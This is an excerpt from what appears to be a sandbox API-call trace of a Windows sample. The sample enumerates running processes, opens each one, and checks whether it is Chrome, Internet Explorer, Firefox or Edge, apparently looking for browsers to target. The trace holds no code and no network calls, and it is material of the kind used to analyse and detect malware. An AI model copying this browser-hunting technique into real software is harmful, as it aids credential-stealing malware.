	[0204.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x28ac
	[0204.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.359] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.359] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.360] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.360] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.360] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x28b0
	[0204.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.361] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.361] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.362] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.362] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x28b4
	[0204.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.364] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.364] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.364] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x28b8
	[0204.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.365] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.366] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.366] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.366] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.366] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x28bc
	[0204.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.367] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.368] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.369] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0204.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x28c0
	[0204.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.369] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0204.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.370] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.370] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0204.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.370] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.371] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x28c4
	[0204.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.371] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.372] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.372] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.372] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.373] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0204.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x28c8
	[0204.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.374] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.378] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.378] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.379] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.379] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.380] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x28cc
	[0204.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.380] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.380] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.380] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.381] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.381] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x28d0
	[0204.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.382] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.382] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.382] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.383] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.383] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0204.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x28d4
	[0204.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.384] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0204.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.384] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.384] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0204.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.385] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.385] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0204.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x28d8
	[0204.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.386] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0204.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.386] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.387] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0204.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.387] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.387] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0204.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x28dc
	[0204.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.388] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.388] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.388] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.389] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.389] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0204.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x28e0
	[0204.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.390] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0204.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.390] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.390] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0204.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.391] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.391] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0204.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0204.393] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0204.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x28e4
	[0204.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.395] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0204.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.396] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.396] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0204.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.397] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.398] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0204.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x28e8
	[0204.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.398] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0204.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.399] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.399] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0204.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.399] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.399] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0204.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x28ec
	[0204.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.400] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0204.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.401] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.401] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0204.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.401] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.401] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0204.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x28f0
	[0204.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.402] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0204.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.403] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.403] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0204.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.404] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.404] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0204.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x28f4
	[0204.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.405] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0204.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.405] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.406] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0204.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.406] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.407] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0204.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x28f8
	[0204.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.408] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0204.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.408] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.408] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0204.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.408] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.409] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0204.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x28fc
	[0204.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.409] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0204.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.410] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.410] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0204.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.411] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.411] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0204.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2900
	[0204.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.412] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0204.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.412] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.413] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0204.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.413] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0204.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2904
	[0204.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.414] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0204.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.414] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.415] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0204.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.415] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.415] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0204.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2908
	[0204.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.416] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0204.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.416] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.416] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0204.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.417] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.417] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0204.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x290c
	[0204.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
